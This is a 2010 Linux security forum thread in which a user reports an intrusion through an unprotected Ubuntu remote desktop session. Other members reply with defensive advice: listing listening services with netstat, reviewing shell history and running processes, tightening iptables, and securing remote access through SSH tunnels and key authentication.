LinuxQuestions.org
LinuxAnswers - the LQ Linux tutorial section.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 04-27-2010, 12:17 PM   #1
The Dude
LQ Newbie
 
Registered: Dec 2005
Posts: 4

Rep: Reputation: 0
Ubuntu Remote Desktop Connection Breech?! dyndns.org?


So, this morning, I was working on my desktop under Ubuntu 9.10 when I got a message in the the upper right telling me that my Remote Desktop Connection had been activated. I don't know who it was, but they proceeded to open up a terminal and start typing a bunch of stuff. This scared the living @#$^ out of me, so I didn't really pay attention to what he was doing and immediately dove for the reset button. I disconnected my network from the web and found that RDC was NOT password protected.

Now, I probably did this a little while ago while I was playing around with it, but I also set up an account with dyndns.org. Would this possibly increase the number of attacks on my network? Just in case, I have removed my listing.

Also, would any of this incident be logged somewhere? How/Where would I look to see if I'm being poked and prodded for another security hole?

I'm still pretty new to linux (I've been using it for about a year now), and I really appreciate your help. So, thanks.
 
Old 04-27-2010, 02:48 PM   #2
anomie
Senior Member
 
Registered: Nov 2004
Location: Texas
Distribution: RHEL, Scientific Linux, Debian, Fedora, Lubuntu, FreeBSD
Posts: 3,930
Blog Entries: 5

Rep: Reputation: Disabled
One of the first things you should do on a newly installed, modified, or inherited system is run:

# netstat -ltnup

Take careful note -- these are all the services that your host is offering up and accepting tcp or udp connections on. If you see applications here that you don't need/want to run, then disable them. If you see applications that are listening on an external interface, but don't need to be, then correct their configuration. You can also plan your host-level firewall ruleset based on what legitimately needs to be listening.

About your dyndns question: I wouldn't necessarily assume that someone found your host using DNS rec info. It is more likely that someone was scanning large subnets, and discovered you had a listening service to attack.
 
Old 04-27-2010, 02:58 PM   #3
corp769
Guru
 
Registered: Apr 2005
Posts: 5,807

Rep: Reputation: 996Reputation: 996Reputation: 996Reputation: 996Reputation: 996Reputation: 996Reputation: 996Reputation: 996
I would also rewrite your iptables to drop incoming requests, allow certain outbound ports, and define which ports you want outgoing, ie bittorent servers/cleints, etc...
 
Old 04-27-2010, 03:55 PM   #4
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,778
Blog Entries: 1

Rep: Reputation: 412Reputation: 412Reputation: 412Reputation: 412Reputation: 412
Quote:
but they proceeded to open up a terminal and start typing a bunch of stuff.
Did you notice what user it was under? Was the prompt a $ or a #? You might look in .bash_history for your users and see if you recognize any of the commands. Try looking at the output of last to see if you can spot what user they were under.

By the way, since this is Ubuntu and they've pretty much abused the daylights out of sudo, I wouldn't connect this machine to the network until you've had a chance to figure out if they've done anything.

Some useful commands:

ps -axfwwwe - look for unusual processes running.

lsof -Pwn - look at open files

netstat -pantue - see if there are any odd network connections

You're looking for things that are odd or unknown.
 
Old 04-28-2010, 03:34 PM   #5
Noway2
Senior Member
 
Registered: Jul 2007
Distribution: Ubuntu 10.10, Slackware 64-current
Posts: 2,124

Rep: Reputation: 776Reputation: 776Reputation: 776Reputation: 776Reputation: 776Reputation: 776Reputation: 776
If I am not mistaken, Remote Desktop Connection is based upon VNC. It is a notoriously insecure application that is responsible for more successful cracks than anything else. If you want remote desktop capability, once you get things straightened out, skip the VNC and use FreeNX or only use VNC through and SSH tunnel. I would also suggest that you get rid of password authentication and use key based only for your SSH. Applications such as fail2ban and denyhosts help to make cracking attempts more difficult because after a couple of failures their IP will be banned for a period of time.
 
Old 04-29-2010, 03:07 PM   #6
unixfool
Member
 
Registered: May 2005
Location: Northern VA
Distribution: Slackware, Ubuntu, FreeBSD, OpenBSD, OS X
Posts: 781
Blog Entries: 8

Rep: Reputation: 157Reputation: 157
Quote:
Originally Posted by Noway2 View Post
If I am not mistaken, Remote Desktop Connection is based upon VNC. It is a notoriously insecure application that is responsible for more successful cracks than anything else. If you want remote desktop capability, once you get things straightened out, skip the VNC and use FreeNX or only use VNC through and SSH tunnel. I would also suggest that you get rid of password authentication and use key based only for your SSH. Applications such as fail2ban and denyhosts help to make cracking attempts more difficult because after a couple of failures their IP will be banned for a period of time.
I don't remember the OP saying that the service had been cracked. He stated that he hadn't password-protected it. He could've done the same thing with FreeNX or any other VNC tool. It wasn't the tool, it was user error that caused this.

OP, do as the others have stated. You can still use RDP if you layer your security: use a password!; use iptables to limit who can use RDP; periodically check your machine's running services via netstat. You can do all of that and have a safe machine and still utilize RDP.
 
Old 04-29-2010, 06:20 PM   #7
unSpawn
Moderator
 
Registered: May 2001
Posts: 26,990
Blog Entries: 54

Rep: Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743Reputation: 2743
Breaches via activated RDP seem to be a problem with .*buntu, the topic pops up regularly in some .*buntu forums...
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Remote desktop connection from ubuntu to winxp cynicalpsycho Linux - Newbie 1 03-21-2009 09:04 PM
remote desktop connection from ubuntu to windows xp bluewing_linux Linux - Newbie 3 12-10-2008 05:55 AM
Remote Desktop Connection hangs on 'Establishing connection...' madala Linux - Networking 1 06-27-2008 03:04 PM
remote desktop connection paul62 Suse/Novell 1 02-10-2007 01:29 PM
Remote desktop connection Bobymc Linux - Networking 5 11-25-2006 01:14 PM


All times are GMT -5. The time now is 09:21 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration